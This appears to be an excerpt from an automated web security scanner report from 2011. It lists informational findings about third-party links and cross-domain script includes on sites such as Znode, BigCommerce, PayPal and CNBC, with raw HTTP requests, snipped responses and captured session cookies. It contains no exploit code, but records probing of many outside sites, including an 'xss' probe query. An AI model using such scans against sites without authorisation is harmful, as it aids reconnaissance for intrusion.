</span><img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""><div class="yt-uix-button-menu yt-uix-button-menu-player" style="display: none;">
...[SNIP]...
</div>


<script src="//s.ytimg.com/yt/jsbin/www-embed_core_module-vflXhboHY.js"></script>
...[SNIP]...

19.119. http://www.znode.com/znode-multifront/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.znode.com
Path:   /znode-multifront/default.aspx

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /znode-multifront/default.aspx?pi_ad_id=7270542494&gclid=CLLul7r4iKsCFQVrgwodzysJ5Q HTTP/1.1
Host: www.znode.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 102934


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head id="ctl00_ctl00_Head1"><title>
   ASP.NET Ecommerce Shopping
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
...[SNIP]...
<!-- End video popup code -->

<a class="highslide" href="http://www.youtube.com/v/dqHwDpwVcic&hl=en_US&fs=0&rel=0&hd=0&showinfo=0" onclick="return openYouTube(this)"><img src="../Data/Default/Images/video-screen-shot-rollover.png" id="ctl00_ctl00_MainContent_SubContent_OverviewMenu_ctl00_idlinkimage" style="border:0 none;" />
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
...[SNIP]...
<!-- End video popup code -->

<a class="highslide" href="http://www.youtube.com/v/dqHwDpwVcic&hl=en_US&fs=0&rel=0&hd=0&showinfo=0" onclick="return openYouTube(this)"><img src="../Data/Default/Images/video-screen-shot-rollover.png" id="ctl00_ctl00_MainContent_SubContent_OverviewMenu_ctl01_idlinkimage" style="border:0 none;" />
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
...[SNIP]...
<!-- End video popup code -->

<a class="highslide" href="http://www.youtube.com/v/dqHwDpwVcic&hl=en_US&fs=0&rel=0&hd=0&showinfo=0" onclick="return openYouTube(this)"><img src="../Data/Default/Images/video-screen-shot-rollover.png" id="ctl00_ctl00_MainContent_SubContent_OverviewMenu_ctl03_idlinkimage" style="border:0 none;" />
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
...[SNIP]...
<div>
<a href="http://www.linkedin.com/groups/Destination-Ecommerce-3879822?gid=3879822&mostPopular=&trk=tyah" style="padding:0px 3px 0px 3px;" target="_blank"><img src="../data/default/images/new_Linkedin.png" alt="Linkd" border="0" /></a>
<a href="http://www.facebook.com/home.php#/pages/Znode/15484708769?ref=s" target="_blank" style="padding:0px 3px 0px 3px;"><img src="../data/default/images/new_facebook.png" id="ctl00_ctl00_Img4" alt="Facebook" border="0" /></a>
<a href="http://destinationecommerce.com/" target="_blank" style="padding:0px 3px 0px 3px;"><img src="../data/default/images/new_DE_Social_Icon.png" border="0" alt="DE social icon" /></a>

<a href="http://twitter.com/znode" target="_blank" style="padding:0px 3px 0px 3px;"><img src="../data/default/images/new_twitter.png" alt="Twitter" border="0" /></a>
<a href="http://www.youtube.com/user/ZnodeInc#p/u" style="padding:0px 3px 0px 3px;" target="_blank"><img src="../Data/Default/Images/new_Youtube.png" alt="youtube" border="0" style="vertical-align:top;" />
...[SNIP]...

20. Cross-domain script include
There are 335 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


20.1. https://account.bigcommerce.com/cart.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.bigcommerce.com
Path:   /cart.php

Issue detail

The response dynamically includes the following script from another domain:

Request

POST /cart.php HTTP/1.1
Host: account.bigcommerce.com
Connection: keep-alive
Referer: http://www.bigcommerce.com/plans.php
Content-Length: 77
Cache-Control: max-age=0
Origin: http://www.bigcommerce.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: roi_visitor=visitorid%3D1421498772%7Cfirstvisit%3D2011-09-06+10%3A32%3A12%7Cquery%3DATG%2Be-commerce%2Bsolutio%7Creferer%3Dwww.google.com%7Clandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; roi_attribution=firstclick%3D2011-09-06+10%3A32%3A12%7Csource%3Dgoogle%7Cmedium%3Dcpc%7Ccampaign%3D%28roi%29+ecommerce%7Cadgroup%3Decommerce+solutions%7Ckeyword%3De+commerce+solutions%7Csitelinks%3D%7Ccreative%3D%7Ctaggedquery%3DATG%2Be-commerce%2Bsolutio%7Ctaggedreferer%3Dwww.google.com%7Ctaggedlandingpage%3D%2Flp%2Fe1-lp-ecommerce.php

a=add&reset=true&previousbillingcycle=-&pid=41&billingcycle=monthly&x=94&y=19

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:38:14 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 15663
Connection: close
Content-Type: text/html; charset=iso-8859-1

           
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html lang="en">
<head>
   <meta http-equiv="Content-type" content="text/html; charset=utf-8">
   <ti
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

20.2. http://ad.doubleclick.net/adi/N763.SpecificMedia/B5646003.2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N763.SpecificMedia/B5646003.2

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adi/N763.SpecificMedia/B5646003.2;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=4749%3Bc=176996%3Bb=1045098%3Bts=20110906105904%3Bdct=;ord=1315321144? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/serve/v=5;m=3;l=4749;c=176996;b=1045098;ts=20110906105904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6342
Date: Tue, 06 Sep 2011 14:59:06 GMT

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->

<!-- Code auto-generated on Tue Apr 12 11:20:48 EDT 2011 -->

<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<!--
Evidon tag
Campaign: FY12 KGSM INQ GEN- BR
Client ID: 279
Notice ID: 1909
Ad Size: 300x250
-->
<script type="text/javascript" src="http://c.betrad.com/surly.js?;ad_w=300;ad_h=250;coid=279;nid=1909;crid=179;"></script>

20.3. http://afe.specificclick.net/serve/v=5

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /serve/v=5

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /serve/v=5;m=3;l=4749;c=176996;b=1045098;ts=20110906110541 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=f45f22ce332bb32f495908027d55

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=f45f2c4eedfe5c52c57643e800e5; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Tue, 06 Sep 2011 15:05:40 GMT
Vary: Accept-Encoding
Content-Length: 1708
Connection: Keep-Alive

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0
...[SNIP]...
5%3Bm=3%3Bl=4749%3Bc=176996%3Bb=1045098%3Bts=20110906110541%3Bdct=;ord=1315321541?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N763.SpecificMedia/B5646003.2;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=4749%3Bc=176996%3Bb=1045098%3Bts=20110906110541%3Bdct=;ord=1315321541?"></SCRIPT>
...[SNIP]...

20.4. http://afe.specificclick.net/serve/v=5

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /serve/v=5

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /serve/v=5;m=3;l=4749;c=177065;b=1045312;ts=20110906111049 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339845382&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=f45f2c4eedfe5c52c57643e800e5

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=f4aa63ac19a41e25cbb18981ca05; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Tue, 06 Sep 2011 15:10:48 GMT
Vary: Accept-Encoding
Content-Length: 1728
Connection: Keep-Alive

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0
...[SNIP]...
5%3Bm=3%3Bl=4749%3Bc=177065%3Bb=1045312%3Bts=20110906111049%3Bdct=;ord=1315321849?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N763.SpecificMedia.com/B5645537.38;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=4749%3Bc=177065%3Bb=1045312%3Bts=20110906111049%3Bdct=;ord=1315321849?"></SCRIPT>
...[SNIP]...

20.5. http://afe.specificclick.net/serve/v=5

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /serve/v=5

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /serve/v=5;m=3;l=4749;c=176996;b=1045098;ts=20110906105904 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=f3fe521e99c2f212b60492987a2d

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Tue, 06 Sep 2011 14:59:05 GMT
Vary: Accept-Encoding
Content-Length: 1708
Connection: Keep-Alive

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0
...[SNIP]...
5%3Bm=3%3Bl=4749%3Bc=176996%3Bb=1045098%3Bts=20110906105905%3Bdct=;ord=1315321145?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N763.SpecificMedia/B5646003.2;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=4749%3Bc=176996%3Bb=1045098%3Bts=20110906105905%3Bdct=;ord=1315321145?"></SCRIPT>
...[SNIP]...

20.6. http://blog.harbottle.com/dm/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.harbottle.com
Path:   /dm/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /dm/ HTTP/1.1
Host: blog.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Harbottle+%26+Lewis
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmb=7854507; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:43:23 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
X-Pingback: http://blog.harbottle.com/dm/xmlrpc.php
Status: 200 OK
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 28681

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<title>Digital Media Law</title>
<base href="http://blog.harbottle.com/dm/">
...[SNIP]...
<!-- end of #wrap -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.7. http://blog.harbottle.com/dm/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.harbottle.com
Path:   /dm/index.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /dm/index.php?s=xss HTTP/1.1
Host: blog.harbottle.com
Proxy-Connection: keep-alive
Referer: http://blog.harbottle.com/dm/?cat=11
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmb=7854507; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; PHPSESSID=b6055d312cfe49b165dbf84a4f9f142b; __utma=40427633.423165929.1315345403.1315345403.1315345403.1; __utmc=40427633; __utmz=40427633.1315345403.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=40427633

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:43:45 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
X-Pingback: http://blog.harbottle.com/dm/xmlrpc.php
Status: 200 OK
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9683

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<title>Digital Media Law</title>
<base href="http://blog.harbottle.com/dm/">
...[SNIP]...
<!-- end of #wrap -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.8. http://blog.ulf-wendel.de/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.ulf-wendel.de
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: blog.ulf-wendel.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:18 GMT
Server: Apache
X-Pingback: http://blog.ulf-wendel.de/xmlrpc.php
X-Powered-By: PHP/4.4.9
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 146024

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org
...[SNIP]...
<link rel='archives' title='September 2005' href='http://blog.ulf-wendel.de/?m=200509' />


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.9. http://blogs.oracle.com/otn/resource/html/tweet2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.oracle.com
Path:   /otn/resource/html/tweet2.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /otn/resource/html/tweet2.html HTTP/1.1
Host: blogs.oracle.com
Proxy-Connection: keep-alive
Referer: http://blogs.oracle.com/otn/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343571486; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Last-Modified: Tue, 10 May 2011 19:11:50 GMT
X-Robots-Tag: noindex,follow
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Content-Language: en
X-Oracle-DMS-ECID: 51608509985984678
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (G;max-age=300+0;age=0;ecid=51608509985984678,0:1)
Content-Length: 905
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:12:52 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=windows-1250">

<title></title>
</head>
<body>

<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

20.10. http://cdn5.tribalfusion.com/media/1956006/frame.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn5.tribalfusion.com
Path:   /media/1956006/frame.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /media/1956006/frame.html HTTP/1.1
Host: cdn5.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339138505&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15838394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3p: CP="NOI DEVo TAIa OUR BUS"
X-Function: 301
Content-Length: 98
Last-Modified: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html
Date: Tue, 06 Sep 2011 14:59:04 GMT
Connection: close
Vary: Accept-Encoding
Expires: Tue, 31 Dec 2030 00:00:00 GMT
Cache-Control: public

<script type="text/javascript" src="http://adadvisor.net/adscores/g.js?sid=9239766368"></script>

20.11. http://cdn5.tribalfusion.com/media/2516896//frm.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn5.tribalfusion.com
Path:   /media/2516896//frm.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /media/2516896//frm.html HTTP/1.1
Host: cdn5.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339138505&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15838394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3p: CP="NOI DEVo TAIa OUR BUS"
X-Function: 301
Last-Modified: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 14:59:04 GMT
Content-Length: 1378
Connection: close
Expires: Tue, 31 Dec 2030 00:00:00 GMT
Expires: Tue, 31 Dec 2030 00:00:00 GMT
Cache-Control: public

<html>
<head>
<script type="text/javascript" src="http://rd.rlcdn.com/rd?type=js&site=108544"></script>
</head>
<body>
<script type="text/javascript">
var segMap = [
[ 40380496
...[SNIP]...

20.12. https://cms.paypal.com/us/cgi-bin/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cms.paypal.com
Path:   /us/cgi-bin/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/cgi-bin/ HTTP/1.1
Host: cms.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=UTF-8
Expires: Tue, 06 Sep 2011 17:06:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 17:06:24 GMT
Content-Length: 24992
Connection: close
Set-Cookie: navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Mon, 01-Sep-2031 17:06:24 GMT; domain=.paypal.com; path=/; Secure; HttpOnly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
</style><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110822-1/js/lib/min/global.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110822-1/js/tns/mid.js"></script>
...[SNIP]...
<!-- OnlineOpinionF3cS v3.0-->
<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110822-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110822-1/js/lib/min/widgets.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110822-1/js/iconix.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110822-1/js/pageBlockingUnsafeBrowsers.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/js/tns/min/bid.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110822-1/js/pp_naturalsearch.js"></script>
...[SNIP]...
<!-- SiteCatalyst Code
Copyright 1997-2005 Omniture, Inc.
More info available at http://www.omniture.com -->
<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110822-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...

20.13. http://data.cnbc.com/quotes

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.cnbc.com
Path:   /quotes

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /quotes HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:05 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Set-Cookie: JSESSIONID=1D2F47641A6DD26BE61912AD60DD5D15; Path=/
Content-Language: en
Content-Type: text/html;charset=UTF-8
Via: 1.1 aicache6
Content-Length: 128064
X-Aicache-OS: 64.210.194.246:80
Connection: Keep-Alive
Keep-Alive: max=20


<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046">
</script>
...[SNIP]...
<body leftmargin="0" topmargin="0" class="cnbc">
       <script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>
       <script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

20.14. http://data.cnbc.com/quotes/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.cnbc.com
